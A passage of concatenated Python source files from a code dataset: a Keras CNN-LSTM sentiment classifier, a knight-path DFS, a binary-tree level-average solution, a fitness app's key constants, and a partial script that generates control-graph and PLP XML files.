keras.layers import LSTM\nfrom keras.layers import Conv1D, MaxPooling1D\nfrom keras_preprocessing.text import Tokenizer\n\nfrom datasets import sentiment_140\nfrom utils.data_utils import export\nfrom w2v import google_news_vectors_negative300\n\n# Embedding\nmaxlen = 100\nmax_features = 20000\n\n# Convolution\nkernel_size = 5\nfilters = 64\npool_size = 4\n\n# LSTM\nlstm_output_size = 70\n\n# Training\nbatch_size = 2048\nepochs = 7\n\nprint('Loading data...')\n(x_train, y_train), (x_val, y_val), (x_test, y_test) = sentiment_140.load_data()\n\nprint('Fitting tokenizer...')\ntokenizer = Tokenizer()\ntokenizer.fit_on_texts(np.concatenate((x_train, x_val, x_test)))\n\nprint('Convert text to sequences')\nx_train = tokenizer.texts_to_sequences(x_train)\nx_val = tokenizer.texts_to_sequences(x_val)\nx_test = tokenizer.texts_to_sequences(x_test)\n\nprint(len(x_train), 'train sequences')\nprint(len(x_val), 'validation sequences')\nprint(len(x_test), 'test sequences')\n\nprint('Pad sequences (samples x time)')\n\nx_train = sequence.pad_sequences(x_train, maxlen=maxlen)\nx_val = sequence.pad_sequences(x_val, maxlen=maxlen)\nx_test = sequence.pad_sequences(x_test, maxlen=maxlen)\n\nprint('x_train shape:', x_train.shape)\nprint('x_val shape:', x_val.shape)\nprint('x_test shape:', x_test.shape)\n\nprint('Loading w2v...')\nword2vec = google_news_vectors_negative300.load_w2v()\n\nprint('Preparing embedding matrix')\nword_index = tokenizer.word_index\nnb_words = len(word_index)+1\nprint(nb_words)\nembedding_matrix = np.zeros((nb_words, 300))\nfor word, i in word_index.items():\n if word in word2vec.vocab:\n embedding_matrix[i] = word2vec.word_vec(word)\nprint('Null word embeddings: %d' % np.sum(np.sum(embedding_matrix, axis=1) == 0))\n\nprint('Build model...')\nmodel = Sequential()\nmodel.add(Embedding(embedding_matrix.shape[0],\n embedding_matrix.shape[1],\n weights=[embedding_matrix],\n input_length=maxlen,\n trainable=False))\nmodel.add(Dropout(0.25))\nmodel.add(Conv1D(filters,\n kernel_size,\n padding='valid',\n activation='relu',\n strides=1))\nmodel.add(MaxPooling1D(pool_size=pool_size))\nmodel.add(LSTM(lstm_output_size))\nmodel.add(Dense(1))\nmodel.add(Activation('sigmoid'))\n\nmodel.compile(loss='binary_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\n\nmodel.summary()\n\nprint('Train...')\nhistory = model.fit(x_train, y_train,\n batch_size=batch_size,\n epochs=epochs,\n validation_data=(x_val, y_val))\nscore, acc = model.evaluate(x_test, y_test, batch_size=batch_size)\nprint('Test score:', score)\nprint('Test accuracy:', acc)\n\nexport(model, history, tokenizer, name=\"sentiment_140_cnn_lstm\", score=score, acc=acc)\n","sub_path":"models/cnn_lstm/sentiment_140_cnn_lstm.py","file_name":"sentiment_140_cnn_lstm.py","file_ext":"py","file_size_in_byte":2990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"200062088","text":"# !/usr/bin/python\n# -*- coding: utf-8 -*-\n\nbd_dictionary = {\n 1: 'a',\n 2: 'b',\n 3: 'c',\n 4: 'd',\n 5: 'e',\n 6: 'f',\n 7: 'g',\n 8: 'h'\n}\n\n\nused = set()\n\n\ndef get_pos(row, col):\n return bd_dictionary[row] + str(col)\n\n\ndef gen_Legal_Moves(x, y):\n newMoves = []\n moveOffsets = [(-1, 2), (1, 2), (2, 1), (2, -1), (1, -2),\n (-1, -2), (-2, -1), (-2, 1)]\n for i in moveOffsets:\n newX = x + i[0]\n newY = y + i[1]\n if legal_Coord(newX) and legal_Coord(newY):\n newMoves.append((newX, newY))\n return newMoves\n\n\ndef legal_Coord(x):\n if x >= 1 and x <= 8:\n return True\n else:\n return False\n\n\ndef 
create_Graph():\n horse_Graph = dict()\n for row in range(1, 9, 1):\n for col in range(1, 9, 1):\n node_Id = get_pos(row, col)\n new_Positions = gen_Legal_Moves(row, col)\n temp = []\n for e in new_Positions:\n n_id = get_pos(e[0], e[1])\n temp.append(n_id)\n horse_Graph.update({node_Id: temp})\n return horse_Graph\n\n\ndef DFS(graph, current, end, fr):\n used.add(current)\n previous[current] = fr\n for node in graph[current]:\n if node not in used:\n if node == end:\n previous[end] = current\n break\n DFS(graph, node, end, current)\n\nif __name__ == \"__main__\":\n global previous\n previous = dict()\n graph = create_Graph()\n with open('in.txt', 'r') as inp:\n data = inp.read().split('\\n')\n start = data[0]\n end = data[1]\n DFS(graph, start, end, start)\n res = []\n now = end\n while now != start:\n res.append(now)\n now = previous[now]\n res.append(start)\n res.reverse()\n with open('out.txt', 'w') as out:\n counter = 1\n for step in res:\n if counter != len(res):\n out.write(step + '\\n')\n counter += 1\n else:\n out.write(step)\n","sub_path":"1-й семестр/problem_two/main_code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"638674379","text":"'''\n\n637. Average of Levels in Binary Tree\n\nGiven a non-empty binary tree, return the average value of the nodes on each level in the form of an array.\n\nExample 1:\n\nInput:\n\n 3\n / \\\n 9 20\n / \\\n 15 7\n\nOutput: [3, 14.5, 11]\n\nExplanation:\n\nThe average value of nodes on level 0 is 3, on level 1 is 14.5, and on level 2 is 11. \n\nHence return [3, 14.5, 11].\n\nNote:\n\nThe range of node's value is in the range of 32-bit signed integer.\n\n'''\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\nfrom collections import deque\nclass Solution(object):\n def averageOfLevels(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[float]\n \"\"\"\n if root is None:\n return []\n queue = deque()\n result = []\n queue.append(root)\n while queue:\n size = len(queue)\n sum = 0.0\n for index in xrange(size):\n cur = queue.popleft()\n sum += cur.val\n if cur.left:\n queue.append(cur.left)\n if cur.right:\n queue.append(cur.right)\n result.append(sum / size)\n return result\n","sub_path":"637.AverageofLevelsinBinaryTree.py","file_name":"637.AverageofLevelsinBinaryTree.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"220581368","text":"# -*- coding: utf-8 -*-\n# \n# # MIT License\n# \n# Copyright (c) 2019 Mike Simms\n# \n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n# \n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n# \n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\"\"\"Key strings for all key/value pairs used in the app\"\"\"\n\n# Keys associated with user management.\nSESSION_KEY = '_straen_username'\nDATABASE_ID_KEY = \"_id\"\nUSERNAME_KEY = \"username\" # Login name for a user\nPASSWORD_KEY = \"password\" # User's password\nPASSWORD1_KEY = \"password1\" # User's password when creating an account\nPASSWORD2_KEY = \"password2\" # User's confirmation password when creating an account\nDEVICE_KEY = \"device\" # Unique identifier for the device which is recording the activity\nDEVICES_KEY = \"devices\" # List of device identifiers\nREALNAME_KEY = \"realname\" # User's real name\nHASH_KEY = \"hash\" # Password hash\nFRIEND_REQUESTS_KEY = \"friend_requests\"\nFRIENDS_KEY = \"friends\"\nREQUESTING_USER_KEY = \"requesting_user\"\nPR_KEY = \"pr\" # Personal record\nEMAIL_KEY = \"email\" # User's email\nTARGET_EMAIL_KEY = \"target_email\" # Email address of another user\n\n# User settings\nDEFAULT_PRIVACY = \"default privacy\"\nPREFERRED_UNITS_KEY = \"preferred units\"\nUNITS_METRIC_KEY = \"metric\"\nUNITS_STANDARD_KEY = \"standard\"\nBIRTHDAY_KEY = \"birthday\"\nDEFAULT_BIRTHDAY = \"315532800\"\nHEIGHT_KEY = \"height\"\nDEFAULT_HEIGHT = \"1.8\"\nWEIGHT_KEY = \"weight\" # User's weight (kilograms)\nDEFAULT_WEIGHT = \"70\"\nGENDER_KEY = \"gender\"\nGENDER_MALE_KEY = \"male\"\nGENDER_FEMALE_KEY = \"female\"\nRESTING_HEART_RATE_KEY = \"resting heart rate\"\nESTIMATED_MAX_HEART_RATE_KEY = \"estimated max heart rate\"\nESTIMATED_FTP_KEY = \"estimated ftp\"\nPREFERRED_LONG_RUN_DAY_KEY = \"preferred long run day\" # Day of the week on which the user prefers to do their long runs\nGOAL_TYPE_KEY = \"goal type\" # Extra info about the user's goal, such as whether they care about speed or just finishing a race\nGOAL_TYPE_COMPLETION = \"Completion\"\nGOAL_TYPE_SPEED = \"Speed\"\n\n# Personal records\nRECORDS_USER_ID = \"user_id\"\nRECORD_NAME = \"record_name\"\nPERSONAL_RECORDS = \"records\"\n\n# Workout plans\nWORKOUT_PLAN_USER_ID_KEY = \"user_id\"\nWORKOUT_PLAN_CALENDAR_ID_KEY = \"calendar id\"\nWORKOUT_LIST_KEY = \"workouts\"\nWORKOUT_ID_KEY = \"workout_id\"\nWORKOUT_TYPE_KEY = \"type\"\nWORKOUT_DESCRIPTION_KEY = \"description\"\nWORKOUT_SPORT_TYPE_KEY = \"sport type\"\nWORKOUT_WARMUP_KEY = \"warmup\"\nWORKOUT_INTERVALS_KEY = \"intervals\"\nWORKOUT_COOLDOWN_KEY = \"cooldown\"\nWORKOUT_SCHEDULED_TIME_KEY = \"scheduled time\"\n\n# Workout types\nWORKOUT_TYPE_REST = \"Rest\"\nWORKOUT_TYPE_EVENT = \"Event\"\nWORKOUT_TYPE_SPEED_RUN = \"Speed Run\"\nWORKOUT_TYPE_INTERVAL_SESSION = \"Interval Session\"\nWORKOUT_TYPE_TEMPO_RUN = \"Tempo Run\"\nWORKOUT_TYPE_EASY_RUN = \"Easy Run\"\nWORKOUT_TYPE_HILL_REPEATS = \"Hill Repeats\" # 4-10 repeats, depending on skill level, done at 5K pace\nWORKOUT_TYPE_MIDDLE_DISTANCE_RUN = \"Middle Distance Run\" # 2 hour run for advanced distance runners\nWORKOUT_TYPE_LONG_RUN = \"Long Run\"\nWORKOUT_TYPE_OPEN_WATER_SWIM = \"Open Water Swim\"\nWORKOUT_TYPE_POOL_WATER_SWIM = \"Pool Swim\"\n\n# Keys associated with uploading data\nUPLOADED_FILE_NAME_KEY = \"uploaded_file_name\"\nUPLOADED_FILE_DATA_KEY = \"uploaded_file_data\"\n\n# Keys inherited from the mobile app. 
Some of these are also used by the web app.\nAPP_NAME_KEY = \"Name\"\nAPP_TIME_KEY = \"Time\"\nAPP_USERNAME_KEY = \"User Name\"\nAPP_DEVICE_ID_KEY = \"DeviceId\"\nAPP_ID_KEY = \"ActivityId\"\nAPP_TYPE_KEY = \"ActivityType\"\nAPP_DISTANCE_KEY = \"Distance\"\nAPP_DURATION_KEY = \"Duration\"\nAPP_CADENCE_KEY = \"Cadence\" # Raw cadence list.\nAPP_TEMP_KEY = \"Temperature\"\nAPP_CURRENT_SPEED_KEY = \"Current Speed\"\nAPP_AVG_SPEED_KEY = \"Avgerage Speed\"\nAPP_MOVING_SPEED_KEY = \"Moving Speed\" \nAPP_SPEED_VARIANCE_KEY = \"Speed Variance\"\nAPP_HEART_RATE_KEY = \"Heart Rate\" # Raw heart rate list.\nAPP_AVG_HEART_RATE_KEY = \"Average Heart Rate\" # Computed average heart rate.\nAPP_CURRENT_PACE_KEY = \"Current Pace\" # Computed pace list.\nAPP_POWER_KEY = \"Power\" # Raw power data list.\nAPP_SETS_KEY = \"Sets\"\nAPP_DISTANCES_KEY = \"distances\" # Distance between data points.\nAPP_LOCATIONS_KEY = \"locations\" # Raw position data.\nAPP_LOCATION_LAT_KEY = \"Latitude\"\nAPP_LOCATION_LON_KEY = \"Longitude\"\nAPP_LOCATION_ALT_KEY = \"Altitude\"\nAPP_ACCELEROMETER_KEY = \"accelerometer\" # Raw accelerometer list.\nAPP_AXIS_NAME_X = \"x\"\nAPP_AXIS_NAME_Y = \"y\"\nAPP_AXIS_NAME_Z = \"z\"\n\nLOCATION_LAT_KEY = \"latitude\"\nLOCATION_LON_KEY = \"longitude\"\nLOCATION_ALT_KEY = \"altitude\"\nLOCATION_TIME_KEY = \"time\"\n\nACCELEROMETER_AXIS_NAME_X = \"x\"\nACCELEROMETER_AXIS_NAME_Y = \"y\"\nACCELEROMETER_AXIS_NAME_Z = \"z\"\nACCELEROMETER_TIME_KEY = \"time\"\n\n# Keys used exclusively by the web app.\nACTIVITY_ID_KEY = \"activity_id\" # Unique identifier for the activity\nACTIVITY_HASH_KEY = \"activity_hash\"\nACTIVITY_TYPE_KEY = \"activity_type\"\nACTIVITY_DESCRIPTION_KEY = \"description\"\nACTIVITY_USER_ID_KEY = \"user_id\"\nACTIVITY_DEVICE_STR_KEY = \"device_str\"\nACTIVITY_LOCATIONS_KEY = \"locations\"\nACTIVITY_NAME_KEY = \"name\"\nACTIVITY_TIME_KEY = \"time\"\nACTIVITY_END_TIME_KEY = \"end_time\"\nACTIVITY_VISIBILITY_KEY = \"visibility\"\nACTIVITY_VISIBILITY_PUBLIC = \"public\"\nACTIVITY_VISIBILITY_PRIVATE = \"private\"\nACTIVITY_COMMENT_KEY = \"comment\"\nACTIVITY_COMMENTS_KEY = \"comments\"\nACTIVITY_COMMENTER_ID_KEY = \"commenter_id\" # User ID of the user leaving the comment on an activity\nACTIVITY_TAG_KEY = \"tag\"\nACTIVITY_TAGS_KEY = \"tags\"\nACTIVITY_SUMMARY_KEY = \"summary_data\"\nACTIVITY_EXPORT_FORMAT_KEY = \"export_format\"\nACTIVITY_NUM_POINTS = \"num_points\" \nACTIVITY_LOCATION_DESCRIPTION_KEY = \"location_description\" # Political description of the activity location (i.e., Florida)\nACTIVITY_INTERVALS = \"intervals\" # Intervals that were computed from the workout\n\n# Keys used to summarize activity data.\nBEST_SPEED = \"Best Speed\"\nBEST_PACE = \"Best Pace\"\nBEST_1K = \"Best 1K\"\nBEST_MILE = \"Best Mile\"\nBEST_5K = \"Best 5K\"\nBEST_10K = \"Best 10K\"\nBEST_15K = \"Best 15K\"\nBEST_HALF_MARATHON = \"Best Half Marathon\"\nBEST_MARATHON = \"Best Marathon\"\nBEST_METRIC_CENTURY = \"Best Metric Century\"\nBEST_CENTURY = \"Best Century\"\nBEST_5_SEC_POWER = \"5 Second Power\"\nBEST_12_MIN_POWER = \"12 Minute Power\"\nBEST_20_MIN_POWER = \"20 Minute Power\"\nBEST_1_HOUR_POWER = \"1 Hour Power\"\nMAX_POWER = \"Maximum Power\"\nMAX_HEART_RATE = \"Maximum Heart Rate\"\nMAX_CADENCE = \"Maximum Cadence\"\nAVG_PACE = \"Average Pace\"\nAVG_POWER = \"Average Power\"\nAVG_HEART_RATE = \"Average Heart Rate\"\nAVG_CADENCE = \"Average Cadence\"\nNORMALIZED_POWER = \"Normalized Power\"\nTHRESHOLD_POWER = \"Threshold Power\"\nINTENSITY_FACTOR = \"Intensity Factor\"\nTSS = \"TSS\" # 
Training Stress Score\nRTSS = \"rTSS\" # Run Training Stress Score\nVARIABILITY_INDEX = \"Variability Index\"\nCLUSTER = \"Cluster\"\nTOTAL_DISTANCE = \"Total Distance\"\nLONGEST_DISTANCE = \"Longest Distance\"\nMILE_SPLITS = \"Mile Splits\"\nKM_SPLITS = \"KM Splits\"\n\n# API-only keys.\nSECONDS = \"seconds\"\nDEVICE_LAST_HEARD_FROM = \"last_heard_from\"\n\n# Running paces.\nLONG_RUN_PACE = \"Long Run Pace\"\nEASY_RUN_PACE = \"Easy Run Pace\"\nTEMPO_RUN_PACE = \"Tempo Run Pace\"\nSPEED_RUN_PACE = \"Speed Run Pace\"\n\n# Keys used to manage gear.\nGEAR_KEY = \"gear\"\nGEAR_ID_KEY = \"gear_id\"\nGEAR_TYPE_KEY = \"type\"\nGEAR_NAME_KEY = \"name\"\nGEAR_DESCRIPTION_KEY = \"description\"\nGEAR_ADD_TIME_KEY = \"add_time\"\nGEAR_RETIRE_TIME_KEY = \"retire_time\"\nGEAR_INITIAL_DISTANCE_KEY = \"initial_distance\"\nGEAR_TYPE_BIKE = \"bike\"\nGEAR_TYPE_SHOES = \"shoes\"\nGEAR_SERVICE_HISTORY = \"service_history\"\n\n# Service record keys.\nSERVICE_RECORD_ID_KEY = \"service_id\"\nSERVICE_RECORD_DATE_KEY = \"date\"\nSERVICE_RECORD_DESCRIPTION_KEY = \"description\"\n\n# Activity types\nTYPE_UNSPECIFIED_ACTIVITY = \"Unknown\"\nTYPE_RUNNING_KEY = \"Running\"\nTYPE_HIKING_KEY = \"Hiking\"\nTYPE_WALKING_KEY = \"Walking\"\nTYPE_CYCLING_KEY = \"Cycling\"\nTYPE_MOUNTAIN_BIKING_KEY = \"Mountain Biking\"\nTYPE_OPEN_WATER_SWIMMING_KEY = \"Open Water Swimming\"\nTYPE_POOL_SWIMMING_KEY = \"Pool Swimming\"\nTYPE_PULL_UP_KEY = \"Pull Up\"\nTYPE_PUSH_UP_KEY = \"Push Up\"\nFOOT_BASED_ACTIVITIES = [ TYPE_RUNNING_KEY, TYPE_HIKING_KEY, TYPE_WALKING_KEY ]\nBIKE_BASED_ACTIVITIES = [ TYPE_CYCLING_KEY, TYPE_MOUNTAIN_BIKING_KEY ]\nSWIMMING_ACTIVITIES = [ TYPE_OPEN_WATER_SWIMMING_KEY, TYPE_POOL_SWIMMING_KEY ]\n\n# Activity names\nUNNAMED_ACTIVITY_TITLE = \"Unnamed\"\n\n# Interval workouts\nINTERVAL_REPEAT_KEY = \"Repeat\"\nINTERVAL_DISTANCE_KEY = \"Distance\"\nINTERVAL_PACE_KEY = \"Pace\"\nINTERVAL_RECOVERY_DISTANCE_KEY = \"Recovery Distance\"\nINTERVAL_RECOVERY_PACE_KEY = \"Recovery Pace\"\n\n# Goals\nGOAL_KEY = \"goal\"\nGOAL_DATE_KEY = \"goal_date\"\nGOAL_SWIM_DISTANCE_KEY = \"goal_swim_distance\"\nGOAL_BIKE_DISTANCE_KEY = \"goal_bike_distance\"\nGOAL_RUN_DISTANCE_KEY = \"goal_run_distance\"\nGOAL_FITNESS_KEY = \"Fitness\"\nGOAL_5K_RUN_KEY = \"5K Run\"\nGOAL_10K_RUN_KEY = \"10K Run\"\nGOAL_15K_RUN_KEY = \"15K Run\"\nGOAL_HALF_MARATHON_RUN_KEY = \"Half Marathon\"\nGOAL_MARATHON_RUN_KEY = \"Marathon\"\n\n# Used by the workout plan generator\nLONGEST_RUN_IN_FOUR_WEEKS_KEY = \"Longest Run In Four Weeks\"\nAGE_YEARS_KEY = \"Age In Years\"\nEXPERIENCE_LEVEL_KEY = \"Experience Level\"\nWEEKS_UNTIL_GOAL_KEY = \"Weeks Until Goal\"\n\n# Used to track deferred tasks\nDEFERRED_TASKS_USER_ID = \"user_id\"\nTASKS_KEY = \"tasks\"\nTASK_ID_KEY = \"task id\"\nTASK_TYPE_KEY = \"task type\"\nTASK_DETAILS_KEY = \"task details\"\nTASK_STATE_KEY = \"task state\"\nIMPORT_TASK_KEY = \"import\"\nANALYSIS_TASK_KEY = \"analysis\"\nWORKOUT_PLAN_TASK_KEY = \"workout plan\"\n\n# Things associated with deferred tasks\nLOCAL_FILE_NAME = \"local file name\"\n\nTIME_KEYS = [ BEST_1K, BEST_MILE, BEST_5K, BEST_10K, BEST_15K, BEST_HALF_MARATHON, BEST_MARATHON, BEST_METRIC_CENTURY, BEST_CENTURY ]\nDISTANCE_KEYS = [ TOTAL_DISTANCE, LONGEST_DISTANCE ]\nSPEED_KEYS = [ APP_CURRENT_SPEED_KEY, APP_AVG_SPEED_KEY, APP_MOVING_SPEED_KEY, APP_SPEED_VARIANCE_KEY, BEST_SPEED ]\nPACE_KEYS = [ APP_CURRENT_PACE_KEY, BEST_PACE, AVG_PACE, LONG_RUN_PACE, EASY_RUN_PACE, TEMPO_RUN_PACE, SPEED_RUN_PACE, INTERVAL_PACE_KEY ]\nPOWER_KEYS = [ AVG_POWER, MAX_POWER, 
BEST_5_SEC_POWER, BEST_12_MIN_POWER, BEST_20_MIN_POWER, BEST_1_HOUR_POWER, NORMALIZED_POWER, THRESHOLD_POWER ]\nHEART_RATE_KEYS = [ AVG_HEART_RATE, MAX_HEART_RATE ]\nCADENCE_KEYS = [ APP_CADENCE_KEY, AVG_CADENCE, MAX_CADENCE ]\nGOALS = [ GOAL_FITNESS_KEY, GOAL_5K_RUN_KEY, GOAL_10K_RUN_KEY, GOAL_15K_RUN_KEY, GOAL_HALF_MARATHON_RUN_KEY, GOAL_MARATHON_RUN_KEY ]\n\nUNSUMMARIZABLE_KEYS = [ APP_SPEED_VARIANCE_KEY, APP_DISTANCES_KEY, APP_LOCATIONS_KEY, ACTIVITY_TIME_KEY, ACTIVITY_TYPE_KEY, ACTIVITY_HASH_KEY, ACTIVITY_LOCATION_DESCRIPTION_KEY, ACTIVITY_INTERVALS, MILE_SPLITS, KM_SPLITS ]\n","sub_path":"Keys.py","file_name":"Keys.py","file_ext":"py","file_size_in_byte":11285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"302265000","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\nimport sys\nimport fileinput\nimport os\nimport re\nfrom pathlib import Path\n\ndef get_args():\n    if len( sys.argv ) != 5:\n        raise IOError(\"Must get: 1. Control graph; 2. Configuration file; 3. Source PLPs folder; 4. Tree depth.\")\n\n    #\n    file_control_graph_input_path = sys.argv[1]\n    print( \"argument: file_control_graph_input_path : \" + file_control_graph_input_path )\n\n\n    file_configuration_input_path = sys.argv[2]\n    print( \"argument: file_configuration_input_path : \" + file_configuration_input_path )\n\n    plps_path = sys.argv[3]\n    print( \"argument: file_source_plp_input_path : \" + plps_path )\n\n    depth_number = int(sys.argv[4])\n\n    if os.path.exists(file_control_graph_input_path):\n        print( \"found: file_control_graph_input_path : \" + file_control_graph_input_path )\n        file_control_graph_input = open( file_control_graph_input_path, 'r+' )\n    else:\n        raise ImportError( \"file_control_graph_input_path file does not exist: \" + file_control_graph_input_path )\n\n    if os.path.exists(file_configuration_input_path):\n        print( \"found: file_configuration_input_path : \" + file_configuration_input_path )\n        file_configuration_input = open( file_configuration_input_path, 'r+' )\n    else:\n        raise ImportError( \"file_configuration_input_path file does not exist: \" + file_configuration_input_path )\n\n    if os.path.exists(plps_path):\n        print( \"found: plps_path : \" + plps_path )\n        #file_source_plp_input = open( file_source_plps_input_path, 'rt' )\n    else:\n        raise ImportError( \"plps_path folder does not exist: \" + plps_path )\n\n    ''' \n    plp_name = re.search(\"(.*/)([^/]*)\\.xml\",\n                  file_source_plps_input_path, re.DOTALL)\n    \n    if ( None != plp_name ):\n        plps_path = plp_name[1]\n        plp_name = plp_name[2]\n        print(\"plps_path: \" + plps_path)\n        print(\"plp_name: \" + plp_name)\n    '''\n\n    return file_control_graph_input, file_configuration_input, plps_path, depth_number\n\ndef open_plp( plps_directory, plp_name):\n    path_to_plp = os.path.join( plps_directory, plp_name )\n    if os.path.exists(path_to_plp):\n        print( \"open plp : \" + path_to_plp )\n        plp_file = open( path_to_plp, 'rt' )\n    else:\n        raise ImportError( \"can not open plp: \" + path_to_plp )\n\n    return plp_file\n\ndef create_probability_tree( depth, root_index, free_index, list_leafs_indexes, text ):\n    if depth < 1:\n        return [ free_index, text ]\n\n    elif depth == 1:\n        reserved_couple_indexes = free_index\n        text += ('\\n'\n                 '\\t\\n'\n                 '\\t\\n'\n                 '\\n').format(index_father=root_index,index_son_left=reserved_couple_indexes,index_son_right=reserved_couple_indexes+1)\n        list_leafs_indexes.append(reserved_couple_indexes)\n        list_leafs_indexes.append(reserved_couple_indexes+1)\n        return [ free_index+2, text ]\n\n    elif depth > 
1:\n reserved_couple_indexes = free_index\n text += ('\\n'\n '\\t\\n'\n '\\t\\n'\n '\\n').format(index_father=root_index,index_son_left=reserved_couple_indexes,index_son_right=reserved_couple_indexes+1)\n\n free_index, text = create_probability_tree(depth - 1, reserved_couple_indexes, free_index + 2, list_leafs_indexes, text)\n free_index, text = create_probability_tree(depth - 1, reserved_couple_indexes + 1, free_index, list_leafs_indexes, text)\n\n return [ free_index, text ]\n\n\ndef main( single_node = True ):\n if sys.version_info[0] < 3: # Python 2 needs utf-8\n reload(sys)\n sys.setdefaultencoding('utf-8')\n\n file_control_graph_input, file_configuration_input, plps_path, depth_number = get_args()\n\n plps_to_delete = [\"achieve_false_0*.xml\", \"achieve_true_0*.xml\", \"maintain_0*.xml\", \"observe_0*.xml\"]\n for plp_to_delete in plps_to_delete:\n for file_path in Path(plps_path).glob(plp_to_delete):\n print(\"remove: \" + str(file_path))\n os.remove(file_path)\n\n plp_name_achieve_false = \"achieve_false_xml\"\n plp_name_achieve_true = \"achieve_true_xml\"\n plp_name_maintain = \"maintain_xml\"\n plp_name_observe = \"observe_xml\"\n plp_file_achieve_false = open_plp(plps_path, plp_name_achieve_false)\n plp_file_achieve_true = open_plp(plps_path, plp_name_achieve_true)\n plp_file_maintain = open_plp(plps_path, plp_name_maintain)\n plp_file_observe = open_plp(plps_path, plp_name_observe)\n plp_text_achieve_false = plp_file_achieve_false.read()\n plp_text_achieve_true = plp_file_achieve_true.read()\n plp_text_maintain = plp_file_maintain.read()\n plp_text_observe = plp_file_observe.read()\n\n control_graph_input_text = file_control_graph_input.read()\n\n sub_flags = re.MULTILINE | re.DOTALL\n\n control_graph_input_text = re.sub(r\"[ \\n\\r]*\", \"\", control_graph_input_text, flags=sub_flags)\n control_graph_input_text = re.sub(r\"[ \\n\\r]*\", \"\", control_graph_input_text, flags=sub_flags)\n control_graph_input_text = re.sub(r\"[ \\n\\r]*\", \"\", control_graph_input_text, flags=sub_flags)\n control_graph_input_text = re.sub(r\"[ \\n\\r]*\", \"\", control_graph_input_text, flags=sub_flags)\n\n control_graph_input_text = re.sub(r']*\"/>', '', control_graph_input_text )\n\n text_for_configuration_variables = \"\"\n text_for_configuration_parameters = \"\"\n\n control_graph_text = \"\"\n nodes_counter = 0\n list_leafs_indexes = []\n nodes_counter, control_graph_text = create_probability_tree( depth_number, nodes_counter, nodes_counter + 1, list_leafs_indexes, control_graph_text)\n\n\n for root_index in list_leafs_indexes:\n node_maintain_index = nodes_counter\n plp_maintain_index = nodes_counter + 1\n node_sequential_observe = nodes_counter + 2\n plp_observe_index = nodes_counter + 3\n node_condition_index = nodes_counter + 4\n node_sequential_achieve_true_index = nodes_counter + 5\n node_sequential_achieve_false_index = nodes_counter + 6\n plp_achieve_true_index = nodes_counter + 7\n plp_achieve_false_index = nodes_counter + 8\n\n control_graph_text += ('\\n'\n '\\t\\n'\n '\\t\\n'\n '\\n'\n '\\n'\n '\\t\\n'\n '\\n'\n '\\n'\n '\\t\\n'\n '\\n'\n '\\n'\n '\\t\\n'\n '\\t\\t\\n'\n '\\t\\t\\t\\n'\n '\\t\\t\\t\\t\\n'\n '\\t\\t\\t\\t\\n'\n '\\t\\t\\t\\t\\n'\n '\\t\\t\\t\\n'\n '\\t\\t\\n'\n '\\t\\n'\n '\\t\\n'\n '\\t\\t\\n'\n '\\t\\t\\t\\n'\n '\\t\\t\\t\\t\\n'\n '\\t\\t\\t\\t\\n'\n '\\t\\t\\t\\t\\n'\n '\\t\\t\\t\\n'\n '\\t\\t\\n'\n '\\t\\n'\n '\\n'\n '\\n'\n '\\t\\n'\n '\\n'\n '\\n'\n '\\t\\n'\n '').format(node_concurrent_index=root_index,\n node_maintain_index = node_maintain_index,\n 
plp_maintain_index = plp_maintain_index,\n node_sequential_observe = node_sequential_observe,\n plp_observe_index = plp_observe_index,\n node_condition_index = node_condition_index,\n node_sequential_achieve_true_index = node_sequential_achieve_true_index,\n node_sequential_achieve_false_index = node_sequential_achieve_false_index,\n plp_achieve_true_index = plp_achieve_true_index,\n plp_achieve_false_index = plp_achieve_false_index)\n\n path_plp_observe = os.path.join( plps_path, \"observe_{plp_observe_index:08d}.xml\".format(plp_observe_index = plp_observe_index) )\n file_plp_observe = open(path_plp_observe, 'wt')\n current_plp_text_observe = plp_text_observe\n current_plp_text_observe = re.sub(r'\"observe_\"', '\"observe_{plp_observe_index:08d}\"'.format(plp_observe_index = plp_observe_index), current_plp_text_observe)\n current_plp_text_observe = re.sub(r'\"observe_goal_\"', '\"observe_goal_{plp_observe_index:08d}\"'.format(plp_observe_index = plp_observe_index), current_plp_text_observe)\n\n file_plp_observe.write( current_plp_text_observe )\n file_plp_observe.close()\n\n text_for_configuration_parameters += '\\n'.format(plp_observe_index = plp_observe_index)\n\n\n path_plp_maintain = os.path.join(plps_path, \"maintain_{plp_maintain_index:08d}.xml\".format(plp_maintain_index=plp_maintain_index))\n file_plp_maintain = open(path_plp_maintain, 'wt')\n current_plp_text_maintain = plp_text_maintain\n current_plp_text_maintain = re.sub(r'\"maintain_\"', '\"maintain_{plp_maintain_index:08d}\"'.format(plp_maintain_index=plp_maintain_index), current_plp_text_maintain)\n current_plp_text_maintain = re.sub(r'\"maintaining_\"', '\"maintaining_{plp_maintain_index:08d}\"'.format(plp_maintain_index=plp_maintain_index), current_plp_text_maintain)\n 